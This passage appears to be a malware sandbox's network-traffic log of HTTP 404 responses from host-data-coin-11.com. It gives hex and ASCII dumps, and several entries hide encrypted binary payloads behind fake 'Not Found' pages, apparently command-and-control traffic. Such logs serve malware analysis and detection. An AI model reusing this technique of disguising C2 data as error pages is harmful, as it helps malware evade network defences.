                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Jan 2022 22:27:55 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 